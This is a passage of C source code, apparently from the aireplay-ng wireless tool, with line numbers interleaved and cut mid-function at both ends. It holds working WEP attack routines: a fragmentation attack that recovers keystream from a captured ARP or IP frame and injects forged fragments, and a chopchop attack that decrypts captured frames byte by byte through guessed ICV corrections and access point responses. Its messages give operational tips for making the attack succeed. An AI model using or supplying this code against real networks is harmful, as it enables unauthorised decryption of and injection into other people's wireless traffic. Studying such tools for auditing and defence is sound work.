if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
3012
perror( "fwrite failed" );
3013
return( 1 );
3014
}
3015
3016
n = pkh.caplen;
3017
3018
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
3019
perror( "fwrite failed" );
3020
return( 1 );
3021
}
3022
3023
fflush( f_cap_out );
3024
}
3025
}
3026
}
3027
3028
return( 0 );
3029
}
3030
3031
int set_clear_arp(uchar *buf, uchar *smac, uchar *dmac) //set first 22 bytes
3032
{
3033
if(buf == NULL)
3034
return -1;
3035
3036
memcpy(buf, S_LLC_SNAP_ARP, 8);
3037
buf[8] = 0x00;
3038
buf[9] = 0x01; //ethernet
3039
buf[10] = 0x08; // IP
3040
buf[11] = 0x00;
3041
buf[12] = 0x06; //hardware size
3042
buf[13] = 0x04; //protocol size
3043
buf[14] = 0x00;
3044
if(memcmp(dmac, BROADCAST, 6) == 0)
3045
buf[15] = 0x01; //request
3046
else
3047
buf[15] = 0x02; //reply
3048
memcpy(buf+16, smac, 6);
3049
3050
return 0;
3051
}
3052
3053
int set_final_arp(uchar *buf, uchar *mymac)
3054
{
3055
if(buf == NULL)
3056
return -1;
3057
3058
//shifted by 10bytes to set source IP as target IP :)
3059
3060
buf[0] = 0x08; // IP
3061
buf[1] = 0x00;
3062
buf[2] = 0x06; //hardware size
3063
buf[3] = 0x04; //protocol size
3064
buf[4] = 0x00;
3065
buf[5] = 0x01; //request
3066
memcpy(buf+6, mymac, 6); //sender mac
3067
buf[12] = 0xA9; //sender IP 169.254.87.197
3068
buf[13] = 0xFE;
3069
buf[14] = 0x57;
3070
buf[15] = 0xC5; //end sender IP
3071
3072
return 0;
3073
}
3074
3075
int set_clear_ip(uchar *buf, int ip_len) //set first 9 bytes
3076
{
3077
if(buf == NULL)
3078
return -1;
3079
3080
memcpy(buf, S_LLC_SNAP_IP, 8);
3081
buf[8] = 0x45;
3082
buf[10] = (ip_len >> 8) & 0xFF;
3083
buf[11] = ip_len & 0xFF;
3084
3085
return 0;
3086
}
3087
3088
int set_final_ip(uchar *buf, uchar *mymac)
3089
{
3090
if(buf == NULL)
3091
return -1;
3092
3093
//shifted by 10bytes to set source IP as target IP :)
3094
3095
buf[0] = 0x06; //hardware size
3096
buf[1] = 0x04; //protocol size
3097
buf[2] = 0x00;
3098
buf[3] = 0x01; //request
3099
memcpy(buf+4, mymac, 6); //sender mac
3100
buf[10] = 0xA9; //sender IP from 169.254.XXX.XXX
3101
buf[11] = 0xFE;
3102
3103
return 0;
3104
}
3105
3106
int do_attack_cfrag( void )
3107
{
3108
int caplen, n;
3109
struct timeval tv;
3110
struct timeval tv2;
3111
float f, ticks[3];
3112
unsigned char bssid[6];
3113
unsigned char smac[6];
3114
unsigned char dmac[6];
3115
uchar keystream[128];
3116
uchar frag1[128], frag2[128], frag3[128];
3117
uchar clear[4096], final[4096], flip[4096];
3118
int isarp;
3119
int z, i;
3120
3121
opt.f_fromds = 0;
3122
3123
read_packets:
3124
3125
if( capture_ask_packet( &caplen, 0 ) != 0 )
3126
return( 1 );
3127
3128
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3129
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3130
z+=2;
3131
3132
if(caplen < z)
3133
{
3134
goto read_packets;
3135
}
3136
3137
if(caplen > 3800)
3138
{
3139
goto read_packets;
3140
}
3141
3142
switch( h80211[1] & 3 )
3143
{
3144
case 0:
3145
memcpy( bssid, h80211 + 16, 6 );
3146
memcpy( dmac, h80211 + 4, 6 );
3147
memcpy( smac, h80211 + 10, 6 );
3148
break;
3149
case 1:
3150
memcpy( bssid, h80211 + 4, 6 );
3151
memcpy( dmac, h80211 + 16, 6 );
3152
memcpy( smac, h80211 + 10, 6 );
3153
break;
3154
case 2:
3155
memcpy( bssid, h80211 + 10, 6 );
3156
memcpy( dmac, h80211 + 4, 6 );
3157
memcpy( smac, h80211 + 16, 6 );
3158
break;
3159
default:
3160
memcpy( bssid, h80211 + 10, 6 );
3161
memcpy( dmac, h80211 + 16, 6 );
3162
memcpy( smac, h80211 + 24, 6 );
3163
break;
3164
}
3165
3166
memset(clear, 0, 4096);
3167
memset(final, 0, 4096);
3168
memset(flip, 0, 4096);
3169
memset(frag1, 0, 128);
3170
memset(frag2, 0, 128);
3171
memset(frag3, 0, 128);
3172
memset(keystream, 0, 128);
3173
3174
/* check if it's a potential ARP request */
3175
3176
//its length 68-24 or 86-24 and going to broadcast or a unicast mac (even first byte)
3177
if( (caplen-z == 68-24 || caplen-z == 86-24) && (memcmp(dmac, BROADCAST, 6) == 0 || (dmac[0]%2) == 0) )
3178
{
3179
/* process ARP */
3180
printf("Found ARP packet\n");
3181
isarp = 1;
3182
//build the new packet
3183
set_clear_arp(clear, smac, dmac);
3184
set_final_arp(final, opt.r_smac);
3185
3186
for(i=0; i<14; i++)
3187
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3188
3189
// correct 80211 header
3190
// h80211[0] = 0x08; //data
3191
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3192
{
3193
h80211[1] = 0x40; //wep
3194
memcpy(h80211+4, smac, 6);
3195
memcpy(h80211+10, opt.r_smac, 6);
3196
memcpy(h80211+16, bssid, 6);
3197
}
3198
else //tods
3199
{
3200
if(opt.f_tods == 1)
3201
{
3202
h80211[1] = 0x41; //wep+ToDS
3203
memcpy(h80211+4 , bssid, 6);
3204
memcpy(h80211+10, opt.r_smac, 6);
3205
memcpy(h80211+16, smac, 6);
3206
}
3207
else
3208
{
3209
h80211[1] = 0x42; //wep+FromDS
3210
memcpy(h80211+4, smac, 6);
3211
memcpy(h80211+10, bssid, 6);
3212
memcpy(h80211+16, opt.r_smac, 6);
3213
}
3214
}
3215
h80211[22] = 0xD0; //frag = 0;
3216
h80211[23] = 0x50;
3217
3218
//need to shift by 10 bytes; (add 1 frag in front)
3219
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3220
frag1[1] |= 0x04; //more frags
3221
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 8);
3222
frag1[z+4+8] = 0x00;
3223
frag1[z+4+9] = 0x01; //ethernet
3224
add_crc32(frag1+z+4, 10);
3225
for(i=0; i<14; i++)
3226
(frag1+z+4)[i] ^= keystream[i];
3227
/* frag1 finished */
3228
3229
for(i=0; i<caplen; i++)
3230
flip[i] = clear[i] ^ final[i];
3231
3232
add_crc32_plain(flip, caplen-z-4-4);
3233
3234
for(i=0; i<caplen-z-4; i++)
3235
(h80211+z+4)[i] ^= flip[i];
3236
h80211[22] = 0xD1; // frag = 1;
3237
3238
//ready to send frag1 / len=z+4+10+4 and h80211 / len = caplen
3239
}
3240
else
3241
{
3242
/* process IP */
3243
printf("Found IP packet\n");
3244
isarp = 0;
3245
//build the new packet
3246
set_clear_ip(clear, caplen-z-4-8-4); //caplen - ieee80211header - IVIDX - LLC/SNAP - ICV
3247
set_final_ip(final, opt.r_smac);
3248
3249
for(i=0; i<8; i++)
3250
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3251
3252
// correct 80211 header
3253
// h80211[0] = 0x08; //data
3254
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3255
{
3256
h80211[1] = 0x40; //wep
3257
memcpy(h80211+4, smac, 6);
3258
memcpy(h80211+10, opt.r_smac, 6);
3259
memcpy(h80211+16, bssid, 6);
3260
}
3261
else
3262
{
3263
if(opt.f_tods == 1)
3264
{
3265
h80211[1] = 0x41; //wep+ToDS
3266
memcpy(h80211+4 , bssid, 6);
3267
memcpy(h80211+10, opt.r_smac, 6);
3268
memcpy(h80211+16, smac, 6);
3269
}
3270
else
3271
{
3272
h80211[1] = 0x42; //wep+FromDS
3273
memcpy(h80211+4, smac, 6);
3274
memcpy(h80211+10, bssid, 6);
3275
memcpy(h80211+16, opt.r_smac, 6);
3276
}
3277
}
3278
h80211[22] = 0xD0; //frag = 0;
3279
h80211[23] = 0x50;
3280
3281
//need to shift by 12 bytes;(add 3 frags in front)
3282
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3283
memcpy(frag2, h80211, z+4); //copy 80211 header and IV
3284
memcpy(frag3, h80211, z+4); //copy 80211 header and IV
3285
frag1[1] |= 0x04; //more frags
3286
frag2[1] |= 0x04; //more frags
3287
frag3[1] |= 0x04; //more frags
3288
3289
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 4);
3290
add_crc32(frag1+z+4, 4);
3291
for(i=0; i<8; i++)
3292
(frag1+z+4)[i] ^= keystream[i];
3293
3294
memcpy(frag2+z+4, S_LLC_SNAP_ARP+4, 4);
3295
add_crc32(frag2+z+4, 4);
3296
for(i=0; i<8; i++)
3297
(frag2+z+4)[i] ^= keystream[i];
3298
frag2[22] = 0xD1; //frag = 1;
3299
3300
frag3[z+4+0] = 0x00;
3301
frag3[z+4+1] = 0x01; //ether
3302
frag3[z+4+2] = 0x08; //IP
3303
frag3[z+4+3] = 0x00;
3304
add_crc32(frag3+z+4, 4);
3305
for(i=0; i<8; i++)
3306
(frag3+z+4)[i] ^= keystream[i];
3307
frag3[22] = 0xD2; //frag = 2;
3308
/* frag1,2,3 finished */
3309
3310
for(i=0; i<caplen; i++)
3311
flip[i] = clear[i] ^ final[i];
3312
3313
add_crc32_plain(flip, caplen-z-4-4);
3314
3315
for(i=0; i<caplen-z-4; i++)
3316
(h80211+z+4)[i] ^= flip[i];
3317
h80211[22] = 0xD3; // frag = 3;
3318
3319
//ready to send frag1,2,3 / len=z+4+4+4 and h80211 / len = caplen
3320
}
3321
3322
3323
/* loop resending the packet */
3324
3325
/* Check if airodump-ng is running. If not, print that message */
3326
printf( "You should also start airodump-ng to capture replies.\n\n" );
3327
3328
signal( SIGINT, sighandler );
3329
ctrl_c = 0;
3330
3331
memset( ticks, 0, sizeof( ticks ) );
3332
3333
nb_pkt_sent = 0;
3334
3335
while( 1 )
3336
{
3337
if( ctrl_c )
3338
goto read_packets;
3339
3340
/* wait for the next timer interrupt, or sleep */
3341
3342
if( dev.fd_rtc >= 0 )
3343
{
3344
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3345
{
3346
perror( "read(/dev/rtc) failed" );
3347
return( 1 );
3348
}
3349
3350
ticks[0]++;
3351
ticks[1]++;
3352
ticks[2]++;
3353
}
3354
else
3355
{
3356
/* we can't trust usleep, since it depends on the HZ */
3357
3358
gettimeofday( &tv, NULL );
3359
usleep( 1000000/RTC_RESOLUTION );
3360
gettimeofday( &tv2, NULL );
3361
3362
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3363
+ (float) ( tv2.tv_usec - tv.tv_usec );
3364
3365
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
3366
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
3367
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
3368
}
3369
3370
/* update the status line */
3371
3372
if( ticks[1] > (RTC_RESOLUTION/10) )
3373
{
3374
ticks[1] = 0;
3375
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
3376
fflush( stdout );
3377
}
3378
3379
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
3380
continue;
3381
3382
/* threshold reached */
3383
3384
ticks[2] = 0;
3385
3386
if( nb_pkt_sent == 0 )
3387
ticks[0] = 0;
3388
3389
if(isarp)
3390
{
3391
if( send_packet( frag1, z+4+10+4 ) < 0 )
3392
return( 1 );
3393
nb_pkt_sent--;
3394
}
3395
else
3396
{
3397
if( send_packet( frag1, z+4+4+4 ) < 0 )
3398
return( 1 );
3399
if( send_packet( frag2, z+4+4+4 ) < 0 )
3400
return( 1 );
3401
if( send_packet( frag3, z+4+4+4 ) < 0 )
3402
return( 1 );
3403
nb_pkt_sent-=3;
3404
}
3405
if( send_packet( h80211, caplen ) < 0 )
3406
return( 1 );
3407
}
3408
3409
return( 0 );
3410
}
3411
3412
int do_attack_chopchop( void )
3413
{
3414
float f, ticks[4];
3415
int i, j, n, z, caplen, srcz;
3416
int data_start, data_end, srcdiff, diff;
3417
int guess, is_deauth_mode;
3418
int nb_bad_pkt;
3419
int tried_header_rec=0;
3420
3421
unsigned char b1 = 0xAA;
3422
unsigned char b2 = 0xAA;
3423
3424
FILE *f_cap_out;
3425
long nb_pkt_read;
3426
unsigned long crc_mask;
3427
unsigned char *chopped;
3428
3429
uchar packet[4096];
3430
3431
time_t tt;
3432
struct tm *lt;
3433
struct timeval tv;
3434
struct timeval tv2;
3435
struct pcap_file_header pfh_out;
3436
struct pcap_pkthdr pkh;
3437
3438
3439
if(getnet(NULL, 1, 0) != 0)
3440
return 1;
3441
3442
srand( time( NULL ) );
3443
3444
if( capture_ask_packet( &caplen, 0 ) != 0 )
3445
return( 1 );
3446
3447
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3448
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3449
z+=2;
3450
srcz = z;
3451
3452
if( (unsigned)caplen > sizeof(srcbuf) || (unsigned)caplen > sizeof(h80211) )
3453
return( 1 );
3454
3455
if( opt.r_smac_set == 1 )
3456
{
3457
//handle picky APs (send one valid packet before all the invalid ones)
3458
memset(packet, 0, sizeof(packet));
3459
3460
memcpy( packet, NULL_DATA, 24 );
3461
memcpy( packet + 4, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3462
memcpy( packet + 10, opt.r_smac, 6 );
3463
memcpy( packet + 16, opt.f_bssid, 6 );
3464
3465
packet[0] = 0x08; //make it a data packet
3466
packet[1] = 0x41; //set encryption and ToDS=1
3467
3468
memcpy( packet+24, h80211+z, caplen-z);
3469
3470
if( send_packet( packet, caplen-z+24 ) != 0 )
3471
return( 1 );
3472
//done sending a correct packet
3473
}
3474
3475
/* Special handling for spanning-tree packets */
3476
if ( memcmp( h80211 + 4, SPANTREE, 6 ) == 0 ||
3477
memcmp( h80211 + 16, SPANTREE, 6 ) == 0 )
3478
{
3479
b1 = 0x42; b2 = 0x42;
3480
}
3481
3482
printf( "\n" );
3483
3484
/* chopchop operation mode: truncate and decrypt the packet */
3485
/* we assume the plaintext starts with AA AA 03 00 00 00 */
3486
/* (42 42 03 00 00 00 for spanning-tree packets) */
3487
3488
memcpy( srcbuf, h80211, caplen );
3489
3490
/* setup the chopping buffer */
3491
3492
n = caplen - z + 24;
3493
3494
if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
3495
{
3496
perror( "malloc failed" );
3497
return( 1 );
3498
}
3499
3500
memset( chopped, 0, n );
3501
3502
data_start = 24 + 4;
3503
data_end = n;
3504
srcdiff = z-24;
3505
3506
chopped[0] = 0x08; /* normal data frame */
3507
chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
3508
3509
/* copy the duration */
3510
3511
memcpy( chopped + 2, h80211 + 2, 2 );
3512
3513
/* copy the BSSID */
3514
3515
switch( h80211[1] & 3 )
3516
{
3517
case 0: memcpy( chopped + 4, h80211 + 16, 6 ); break;
3518
case 1: memcpy( chopped + 4, h80211 + 4, 6 ); break;
3519
case 2: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3520
default: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3521
}
3522
3523
/* copy the WEP IV */
3524
3525
memcpy( chopped + 24, h80211 + z, 4 );
3526
3527
/* setup the xor mask to hide the original data */
3528
3529
crc_mask = 0;
3530
3531
for( i = data_start; i < data_end - 4; i++ )
3532
{
3533
switch( i - data_start )
3534
{
3535
case 0: chopped[i] = b1 ^ 0xE0; break;
3536
case 1: chopped[i] = b2 ^ 0xE0; break;
3537
case 2: chopped[i] = 0x03 ^ 0x03; break;
3538
default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
3539
}
3540
3541
crc_mask = crc_tbl[crc_mask & 0xFF]
3542
^ ( crc_mask >> 8 )
3543
^ ( chopped[i] << 24 );
3544
}
3545
3546
for( i = 0; i < 4; i++ )
3547
crc_mask = crc_tbl[crc_mask & 0xFF]
3548
^ ( crc_mask >> 8 );
3549
3550
chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
3551
chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
3552
chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
3553
chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
3554
3555
for( i = data_start; i < data_end; i++ )
3556
chopped[i] ^= srcbuf[i+srcdiff];
3557
3558
data_start += 6; /* skip the SNAP header */
3559
3560
/* if the replay source mac is unspecified, forge one */
3561
3562
if( opt.r_smac_set == 0 )
3563
{
3564
is_deauth_mode = 1;
3565
3566
opt.r_smac[0] = 0x00;
3567
opt.r_smac[1] = rand() & 0x3E;
3568
opt.r_smac[2] = rand() & 0xFF;
3569
opt.r_smac[3] = rand() & 0xFF;
3570
opt.r_smac[4] = rand() & 0xFF;
3571
3572
memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3573
}
3574
else
3575
{
3576
is_deauth_mode = 0;
3577
3578
opt.r_dmac[0] = 0xFF;
3579
opt.r_dmac[1] = rand() & 0xFE;
3580
opt.r_dmac[2] = rand() & 0xFF;
3581
opt.r_dmac[3] = rand() & 0xFF;
3582
opt.r_dmac[4] = rand() & 0xFF;
3583
}
3584
3585
/* let's go chopping */
3586
3587
memset( ticks, 0, sizeof( ticks ) );
3588
3589
nb_pkt_read = 0;
3590
nb_pkt_sent = 0;
3591
nb_bad_pkt = 0;
3592
guess = 256;
3593
3594
tt = time( NULL );
3595
3596
alarm( 30 );
3597
3598
signal( SIGALRM, sighandler );
3599
3600
if(opt.port_in <= 0)
3601
{
3602
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
3603
{
3604
perror( "fcntl(O_NONBLOCK) failed" );
3605
return( 1 );
3606
}
3607
}
3608
3609
while( data_end > data_start )
3610
{
3611
if( alarmed )
3612
{
3613
printf( "\n\n"
3614
"The chopchop attack appears to have failed. Possible reasons:\n"
3615
"\n"
3616
" * You're trying to inject with an unsupported chipset (Centrino?).\n"
3617
" * The driver source wasn't properly patched for injection support.\n"
3618
" * You are too far from the AP. Get closer or reduce the send rate.\n"
3619
" * Target is 802.11g only but you are using a Prism2 or RTL8180.\n"
3620
" * The wireless interface isn't setup on the correct channel.\n" );
3621
if( is_deauth_mode )
3622
printf(
3623
" * The AP isn't vulnerable when operating in non-authenticated mode.\n"
3624
" Run aireplay-ng in authenticated mode instead (-h option).\n\n" );
3625
else
3626
printf(
3627
" * The client MAC you have specified is not currently authenticated.\n"
3628
" Try running another aireplay-ng to fake authentication (attack \"-1\").\n"
3629
" * The AP isn't vulnerable when operating in authenticated mode.\n"
3630
" Try aireplay-ng in non-authenticated mode instead (no -h option).\n\n" );
3631
return( 1 );
3632
}
3633
3634
/* wait for the next timer interrupt, or sleep */
3635
3636
if( dev.fd_rtc >= 0 )
3637
{
3638
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3639
{
3640
perror( "\nread(/dev/rtc) failed" );
3641
return( 1 );
3642
}
3643
3644
ticks[0]++; /* ticks since we entered the while loop */
3645
ticks[1]++; /* ticks since the last status line update */
3646
ticks[2]++; /* ticks since the last frame was sent */
3647
ticks[3]++; /* ticks since started chopping current byte */
3648
}
3649
else
3650
{
3651
/* we can't trust usleep, since it depends on the HZ */
3652
3653
gettimeofday( &tv, NULL );
3654
usleep( 976 );
3655
gettimeofday( &tv2, NULL );
3656
3657
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3658
+ (float) ( tv2.tv_usec - tv.tv_usec );
3659
3660
ticks[0] += f / 976;
3661
ticks[1] += f / 976;
3662
ticks[2] += f / 976;
3663
ticks[3] += f / 976;
3664
}
3665
3666
/* update the status line */
3667
3668
if( ticks[1] > (RTC_RESOLUTION/10) )
3669
{
3670
ticks[1] = 0;
3671
printf( "\rSent %3ld packets, current guess: %02X...\33[K",
3672
nb_pkt_sent, guess );
3673
fflush( stdout );
3674
}
3675
3676
if( data_end < 41 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
3677
(int) ( caplen - ( data_end - 1 ) ) )
3678
{
3679
header_rec:
3680
3681
printf( "\n\nThe AP appears to drop packets shorter "
3682
"than %d bytes.\n",data_end );
3683
3684
data_end = 40;
3685
3686
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3687
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3688
z+=2;
3689
3690
diff = z-24;
3691
3692
if( ( chopped[data_end + 0] ^ srcbuf[data_end + srcdiff + 0] ) == 0x06 &&
3693
( chopped[data_end + 1] ^ srcbuf[data_end + srcdiff + 1] ) == 0x04 &&
3694
( chopped[data_end + 2] ^ srcbuf[data_end + srcdiff + 2] ) == 0x00 )
3695
{
3696
printf( "Enabling standard workaround: "
3697
"ARP header re-creation.\n" );
3698
3699
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3700
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x06;
3701
chopped[24 + 12] = srcbuf[srcz + 12] ^ 0x00;
3702
chopped[24 + 13] = srcbuf[srcz + 13] ^ 0x01;
3703
chopped[24 + 14] = srcbuf[srcz + 14] ^ 0x08;
3704
chopped[24 + 15] = srcbuf[srcz + 15] ^ 0x00;
3705
}
3706
else
3707
{
3708
printf( "Enabling standard workaround: "
3709
" IP header re-creation.\n" );
3710
3711
n = caplen - ( z + 16 );
3712
3713
chopped[24 + 4] = srcbuf[srcz + 4] ^ 0xAA;
3714
chopped[24 + 5] = srcbuf[srcz + 5] ^ 0xAA;
3715
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3716
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3717
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3718
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3719
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3720
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x00;
3721
chopped[24 + 14] = srcbuf[srcz + 14] ^ ( n >> 8 );
3722
chopped[24 + 15] = srcbuf[srcz + 15] ^ ( n & 0xFF );
3723
3724
memcpy( h80211, srcbuf, caplen );
3725
3726
for( i = z + 4; i < (int) caplen; i++ )
3727
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3728
3729
/* sometimes the header length or the tos field vary */
3730
3731
for( i = 0; i < 16; i++ )
3732
{
3733
h80211[z + 8] = 0x40 + i;
3734
chopped[24 + 12] = srcbuf[srcz + 12] ^ ( 0x40 + i );
3735
3736
for( j = 0; j < 256; j++ )
3737
{
3738
h80211[z + 9] = j;
3739
chopped[24 + 13] = srcbuf[srcz + 13] ^ j;
3740
3741
if( check_crc_buf( h80211 + z, caplen - z - 8 ) )
3742
goto have_crc_match;
3743
}
3744
}
3745
3746
printf( "This doesn't look like an IP packet, "
3747
"try another one.\n" );
3748
}
3749
3750
have_crc_match:
3751
break;
3752
}
3753
3754
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
3755
{
3756
/* send one modified frame */
3757
3758
ticks[2] = 0;
3759
3760
memcpy( h80211, chopped, data_end - 1 );
3761
3762
/* note: guess 256 is special, it tests if the *
3763
* AP properly drops frames with an invalid ICV *
3764
* so this guess always has its bit 8 set to 0 */
3765
3766
if( is_deauth_mode )
3767
{
3768
opt.r_smac[1] |= ( guess < 256 );
3769
opt.r_smac[5] = guess & 0xFF;
3770
}
3771
else
3772
{
3773
opt.r_dmac[1] |= ( guess < 256 );
3774
opt.r_dmac[5] = guess & 0xFF;
3775
}
3776
3777
memcpy( h80211 + 10, opt.r_smac, 6 );
3778
memcpy( h80211 + 16, opt.r_dmac, 6 );
3779
3780
if( guess < 256 )
3781
{
3782
h80211[data_end - 2] ^= crc_chop_tbl[guess][3];
3783
h80211[data_end - 3] ^= crc_chop_tbl[guess][2];
3784
h80211[data_end - 4] ^= crc_chop_tbl[guess][1];
3785
h80211[data_end - 5] ^= crc_chop_tbl[guess][0];
3786
}
3787
3788
errno = 0;
3789
3790
if( send_packet( h80211, data_end -1 ) != 0 )
3791
return( 1 );
3792
3793
if( errno != EAGAIN )
3794
{
3795
guess++;
3796
3797
if( guess > 256 )
3798
guess = 0;
3799
}
3800
}
3801
3802
/* watch for a response from the AP */
3803
3804
n = read_packet( h80211, sizeof( h80211 ), NULL );
3805
3806
if( n < 0 ) return( 1 );
3807
if( n == 0 ) continue;
3808
3809
nb_pkt_read++;
3810
3811
/* check if it's a deauth packet */
3812
3813
if( h80211[0] == 0xA0 || h80211[0] == 0xC0 )
3814
{
3815
if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
3816
! is_deauth_mode )
3817
{
3818
nb_bad_pkt++;
3819
3820
if( nb_bad_pkt > 256 )
3821
{
3822
printf("\rgot several deauthentication packets - pausing 3 seconds for reconnection\n");
3823
sleep(3);
3824
nb_bad_pkt = 0;
3825
}
3826
3827
continue;
3828
}
3829
3830
if( h80211[4] != opt.r_smac[0] ) continue;
3831
if( h80211[6] != opt.r_smac[2] ) continue;
3832
if( h80211[7] != opt.r_smac[3] ) continue;
3833
if( h80211[8] != opt.r_smac[4] ) continue;
3834
3835
if( ( h80211[5] & 0xFE ) !=
3836
( opt.r_smac[1] & 0xFE ) ) continue;
3837
3838
if( ! ( h80211[5] & 1 ) )
3839
{
3840
if( data_end < 41 ) goto header_rec;
3841
3842
printf( "\n\nFailure: the access point does not properly "
3843
"discard frames with an\ninvalid ICV - try running "
3844
"aireplay-ng in authenticated mode (-h) instead.\n\n" );
3845
return( 1 );
3846
}
3847
}
3848
else
3849
{
3850
if( is_deauth_mode )
3851
continue;
3852
3853
/* check if it's a WEP data packet */
3854
3855
if( ( h80211[0] & 0x0C ) != 8 ) continue;
3856
if( ( h80211[0] & 0x70 ) != 0 ) continue;
3857
if( ( h80211[1] & 0x03 ) != 2 ) continue;
3858
if( ( h80211[1] & 0x40 ) == 0 ) continue;
3859
3860
/* check the extended IV (TKIP) flag */
3861
3862
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3863
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3864
z+=2;
3865
3866
if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
3867
3868
/* check the destination address */
3869
3870
if( h80211[4] != opt.r_dmac[0] ) continue;
3871
if( h80211[6] != opt.r_dmac[2] ) continue;
3872
if( h80211[7] != opt.r_dmac[3] ) continue;
3873
if( h80211[8] != opt.r_dmac[4] ) continue;
3874
3875
if( ( h80211[5] & 0xFE ) !=
3876
( opt.r_dmac[1] & 0xFE ) ) continue;
3877
3878
if( ! ( h80211[5] & 1 ) )
3879
{
3880
if( data_end < 41 ) goto header_rec;
3881
3882
printf( "\n\nFailure: the access point does not properly "
3883
"discard frames with an\ninvalid ICV - try running "
3884
"aireplay-ng in non-authenticated mode instead.\n\n" );
3885
return( 1 );
3886
}
3887
}
3888
3889
/* we have a winner */
3890
3891
guess = h80211[9];
3892
3893
chopped[data_end - 1] ^= guess;
3894
chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
3895
chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
3896
chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
3897
chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
3898
3899
n = caplen - data_start;
3900
3901
printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
3902
"%4ld frames written in %5.0fms\n", data_end - 1,
3903
100 * ( caplen - data_end ) / n,
3904
chopped[data_end - 1],
3905
chopped[data_end - 1] ^ srcbuf[data_end + srcdiff - 1],
3906
nb_pkt_sent, ticks[3] );
3907
3908
if( is_deauth_mode )
3909
{
3910
opt.r_smac[1] = rand() & 0x3E;
3911
opt.r_smac[2] = rand() & 0xFF;
3912
opt.r_smac[3] = rand() & 0xFF;
3913
opt.r_smac[4] = rand() & 0xFF;
3914
}
3915
else
3916
{
3917
opt.r_dmac[1] = rand() & 0xFE;
3918
opt.r_dmac[2] = rand() & 0xFF;
3919
opt.r_dmac[3] = rand() & 0xFF;
3920
opt.r_dmac[4] = rand() & 0xFF;
3921
}
3922
3923
ticks[3] = 0;
3924
nb_pkt_sent = 0;
3925
nb_bad_pkt = 0;
3926
guess = 256;
3927
3928
data_end--;
3929
3930
alarm( 0 );
3931
}
3932
3933
/* reveal the plaintext (chopped contains the prga) */
3934
3935
memcpy( h80211, srcbuf, caplen );
3936
3937
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3938
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3939
z+=2;
3940
diff = z-24;
3941
3942
chopped[24 + 4] = srcbuf[srcz + 4] ^ b1;
3943
chopped[24 + 5] = srcbuf[srcz + 5] ^ b2;
3944
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3945
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3946
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3947
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3948
3949
for( i = z + 4; i < (int) caplen; i++ )
3950
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3951
3952
if( ! check_crc_buf( h80211 + z, caplen - z - 8 ) ) {
3953
if (!tried_header_rec) {
3954
printf( "\nWarning: ICV checksum verification FAILED! Trying workaround.\n" );
3955
tried_header_rec=1;
3956
goto header_rec;
3957
} else {
3958
printf( "\nWorkaround couldn't fix ICV checksum.\nPacket is most likely invalid/useless\nTry another one.\n" );
3959
}
3960
}
3961
3962
caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
3963
3964
